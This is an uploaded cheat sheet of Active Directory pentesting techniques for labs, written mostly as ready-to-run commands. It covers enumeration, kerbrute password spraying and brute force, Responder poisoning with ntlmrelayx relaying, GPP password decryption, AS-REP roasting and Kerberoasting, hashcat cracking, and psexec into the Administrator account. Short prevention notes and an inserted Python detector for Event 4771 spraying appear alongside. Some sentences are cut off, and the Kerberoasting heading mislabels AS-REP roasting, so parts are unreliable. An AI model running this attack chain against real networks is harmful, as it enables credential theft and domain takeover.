Active Directory Pentesting Techniques

This document provides an overview of techniques for Active Directory enumeration and security assessments, including LDAP, SMB, and Kerberos enumeration methods. It outlines various tools and commands for discovering network services, extracting GPOs, and performing brute-force attacks on identified users. Additionally, it discusses NTLM relay attacks and preventive measures to enhance security in Active Directory environments.

Uploaded by

Muhammad Ijaz

Summary

This document gives a brief overview of the techniques used to solve Active Directory labs.

Sno / Topic / Objective / Command

1. Discover open ports and services on the network.
   Command: nmap -sS -p 135,389,445,636,3268,3269,53,88 <IP Address>
2. Identify the domain controller.
   Command: nmap -sV --script ldap-rootdse -p 389 <IP Address>
3. Verify the domain controller using nslookup (DNS SRV records).
   Command: nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>
4. Verify the domain controller using PowerShell.
   Command: Get-ADDomainController -Discover -DomainName <domain>

LDAP Enumeration
5. Using ldapsearch (Linux).
   Command: ldapsearch -x -H ldap://<IP Address> -b "dc=example,dc=com"
6. Using AD Explorer (Windows): use the GUI to query the AD database.

SMB Enumeration
7. Using smbclient.
   Command: smbclient -L //<IP Address> -U ""
8. For brute-forcing SMB.
   Command: crackmapexec smb <IP Range> -u <user> -p <password>
9. Using rpcclient.
   Command: rpcclient -U "" <IP Address>, then enumdomusers and enumalsgroups

Kerberos Enumeration
10. Find valid usernames for brute force.
    Command: [Link] <domain>/<username> -request
11. Verify SPNs (Service Principal Names).
    Command: [Link] <domain>/<username> -dc-ip <IP>

Extract GPOs and Shares
12. Group Policy enumeration.
    Command: [Link] -d <domain> -u <user> -p <password>
13. Shared folders enumeration (Windows).
    Command: net share

CrackMapExec and Kerbrute for Automation
14. CrackMapExec for wide AD recon.
    Commands: crackmapexec smb <IP Range> --shares
              crackmapexec smb <IP Range> --users
15. Kerbrute for username brute force.
    Command: kerbrute userenum -d <domain> [Link] -t 5

16. Enumerate the list of valid users on AD using the nmap command. The Nmap script is run with the user list obtained above and reports which of those users are valid (or not valid) for Kerberos authentication.
    Command: nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='[Link]',userdb=sample_users.txt" <domain_ip>
17. The same using Metasploit.
    Module: auxiliary/gather/kerberos_enumusers
18. Use the LDAP exe on Windows to check whether anonymous login is enabled on the LDAP server or not. This can also be done from the CLI on Kali Linux with:
    ldapsearch -LL -x -H ldap://dc1.<target-domain-name> -b '' -s base '(objectclass=*)'
19. Check whether a null session is enabled (a null session is nothing but logging into the system without a username and password) using enum4linux.
    Command: enum4linux -a <AD-IP>
20. Using rpcclient.
    Commands: rpcclient -U "" -N <ad-ip>
              rpcclient -U "<domain>\<username>" <ad-ip>
21. Password brute force for identified users on AD, using Metasploit.
    Module: auxiliary/scanner/smb/smb_login
22. ropnop kerbrute, which does user enumeration and also password spraying.
    User enumeration: ./kerbrute_linux_amd64 userenum -d [Link] [Link]
    Password spray: ./kerbrute_linux_amd64 passwordspray -d [Link] domain_users.txt Password123
    Brute force (with combined username and password): cat [Link] | ./kerbrute -d [Link] bruteforce -
23. Event ID 4771 ("Kerberos Pre-Authentication Failed") generates an alert for the admins, so admins are able to see that someone is doing wrong things.
24. ADRecon.ps1 - complete tool for Active Directory recon.
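The Event ID 4771 note above is the defender's view of the kerbrute password spray and brute-force rows in the same sheet. As an added example that is not part of the original sheet, this Python snippet parses constructed 4771 records (a simplified one-line text form of the event's TargetUserName, ClientAddress and FailureCode fields, which is an assumption; real events are EVTX/XML) and flags a source address that fails pre-authentication against many distinct accounts within a short window, which is what a spray looks like in the Security log.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines shaped like Security event 4771/4768 fields; not real DC logs.
# FailureCode 0x18 = KDC_ERR_PREAUTH_FAILED (wrong password for an existing account).
SAMPLE_EVENTS = [
    "2024-05-01T09:00:01 EventID=4771 TargetUserName=alice ClientAddress=10.0.0.5 FailureCode=0x18",
    "2024-05-01T09:00:02 EventID=4771 TargetUserName=bob ClientAddress=10.0.0.5 FailureCode=0x18",
    "2024-05-01T09:00:03 EventID=4771 TargetUserName=carol ClientAddress=10.0.0.5 FailureCode=0x18",
    "2024-05-01T09:00:04 EventID=4771 TargetUserName=dave ClientAddress=10.0.0.5 FailureCode=0x18",
    "2024-05-01T09:00:05 EventID=4771 TargetUserName=erin ClientAddress=10.0.0.5 FailureCode=0x18",
    # one user mistyping a password twice from a workstation: not a spray
    "2024-05-01T09:01:00 EventID=4771 TargetUserName=grace ClientAddress=10.0.0.9 FailureCode=0x18",
    "2024-05-01T09:01:20 EventID=4771 TargetUserName=grace ClientAddress=10.0.0.9 FailureCode=0x18",
    # a 4768 (TGT requested) line is not a pre-auth failure and is ignored
    "2024-05-01T09:02:00 EventID=4768 TargetUserName=heidi ClientAddress=10.0.0.5 FailureCode=0x0",
]

EVENT_RE = re.compile(
    r"(?P<ts>\S+) EventID=(?P<id>\d+) TargetUserName=(?P<user>\S+) "
    r"ClientAddress=(?P<ip>\S+) FailureCode=(?P<code>0x[0-9A-Fa-f]+)"
)

def parse_event(line):
    """Parse one constructed record into a dict, or return None if it does not match."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    return ev

def detect_spray(lines, window=timedelta(minutes=5), min_accounts=5):
    """Return {client_ip: sorted accounts} for every source that produced 4771/0x18
    failures against at least min_accounts distinct accounts inside one sliding window."""
    failures = [e for e in map(parse_event, lines)
                if e and e["id"] == "4771" and e["code"].lower() == "0x18"]
    by_ip = defaultdict(list)
    for ev in sorted(failures, key=lambda e: e["ts"]):
        by_ip[ev["ip"]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        for i, first in enumerate(evs):  # slide the window over this source's failures
            accounts = {e["user"] for e in evs[i:] if e["ts"] - first["ts"] <= window}
            if len(accounts) >= min_accounts:
                alerts[ip] = sorted(accounts)
                break
    return alerts
```

Tune `window` and `min_accounts` to the environment; a single account failing repeatedly (grace above) is lockout noise, while one source touching many accounts once each is the spray pattern.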
NTLM Relay Attack

Sno / Topic Name / Key Notes

1. What is an NTLM Relay Attack?
   NTLM relay attacks allow attackers to sit between clients and servers and relay validated requests in order to access network services.

2. How do NetBIOS and LLMNR work?
   1. These two protocols have been implemented by Windows. LLMNR is the successor to NetBIOS; for reasons of backward compatibility, both have been enabled by default since Windows
   2. Their purpose is to supplement the DNS protocol when it fails to resolve an address. The difference is that their queries are not sent to a specific server (the DNS server) but are broadcast on the subnet. This enables automatic discovery but also allows any machine on the subnet to respond to requests.

Steps to do NTLM Relay Attack

1. Running Responder on the attacker's machine:
   sudo responder -I eth0 (or <specific Interface> where the attacker is connected)

2. How the NTLM Relay attack works: in this case, the Responder program (still deployed on our machine) will be used only as an LLMNR poisoning tool, and all incoming connection requests will be relayed to a target service (an NTLM-compatible service).

NTLM relay on SMB services

1. To attack the network's SMB services, we modify the configuration file of the Responder program so that it does not start its SMB server:
   nano /etc/responder/[Link]

2. Identifying vulnerable SMB services:
   crackmapexec smb --gen-relay-list smb_targets.txt [Link]/24

Launching Ntlmrelayx against target services

1. Command:
   [Link] -socks -smb2support -tf smb_targets.txt
   (The "socks" parameter is used to instruct the tool to store retrieved sessions in a proxy on the attacker's machine.)

2. By default, Ntlmrelayx opens a SOCKS service on port 1080 of the "localhost" interface. So, we need to modify the proxychains configuration so that it interacts with this port.

3. To do this, we apply the following configuration:
   sudo nano /etc/[Link]

Now we are ready to start the attack again on Responder.

Blog Link --> [Link]/blog/understanding-ntlm-authentication-and-ntlm-relay-attacks/#ntlmv1

How to prevent NTLM Relay Attacks?

1. To prevent NTLM relay attacks, it is possible to counter each of the methods used to obtain a NET-NTLM hash:
   1. Disable the LLMNR/NETBIOS protocol(s),
   2. Disable all Microsoft services vulnerable to coerced attacks,
   3. Set up a static ARP table, etc.

2. The most effective way of countering the relay is to implement these actions on the servers:
   1. Disable NTLM authentication on your network and delegate it solely to Kerberos if
   2. Enable signing on SMB and LDAP.
   3. The HTTPS protocol does not support signing. You can therefore disable the NTLM protocol for these services specifically, or you can use EPA (Extended Protection for Authentication). This protection adds a signature to protocols that do not implement one themselves.

First of all, always start with the file shares available on the targeted IP address:
smbmap -H <target_IP>

Now check the access and proceed accordingly. To list all the files and folders, run the command below:

smbclient //<target_ip>/<target-share-name> -c 'recurse;ls'

Next, try the manual method for SMB login.
Log into the SMB server anonymously: smbclient //<target-ip>/file-share-name
Just press Enter without entering a password.
Whenever we get into the SMB server, we need to check each and every file for any passwords stored in it.
We will get one encrypted password value from the [Link] file; first decrypt it:
gpp-decrypt <hash-value>

Now, with the username and password obtained from the [Link] file, check what access we have:

smbmap -u <target_username> -p <password> -H <target_IP>

Once that is done, try to get the TGT for the target user using the impacket command below:
impacket-GetNPUsers -dc-ip <domain-controller-ip> [Link]/<username> -no-pass
Tool number 2 for the same attack above:
impacket-GetUserSPNs -dc-ip <ip> [Link]/<target_username>:<password_got_from_group_policy> -request
Mostly, when we run the above command we get a clock-skew (time) error, which we need to rectify by syncing our clock with the DC:
sudo ntpdate <target-dc-ip>
Once done, run the ticket attack above again and the ticket is obtained!
Now save the hash to a file and use hashcat to crack the ticket hash:
(We can also do a pass-the-hash attack; refer to the Pass The Hash sheet in the same workbook.)
hashcat -m 13100 -a 0 <hash_file.txt> <wordlist_file>

Once the password is obtained, use the target admin's account to check what file shares are accessible:

smbmap -u Administrator -p <admin-password> -H <target_ip>

Now get into the admin's system with the impacket command below:
impacket-psexec <[Link]/htb>/Administrator@<target-IP>
Press Enter, then enter the admin's password.
That's all, we are into the Admin's machine.
Kerberoasting Attack

First we need the list of user accounts present in Active Directory, obtained with the user enumeration command below:
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='[Link]',userdb=<userlist-file>" <domain_ip>
Now run the impacket script below to perform the pre-authentication (AS-REP) attack on the accounts found:
impacket-GetNPUsers <domain>/ -no-pass -usersfile got_valid_north.txt
Now extract the real password from the password hash:
hashcat -m 18200 --force -a 0 <password_file.txt> [Link]
How to Fix this Vulnerability
Make sure the "Do not require Kerberos preauthentication" account option is cleared (not enabled) on every account.
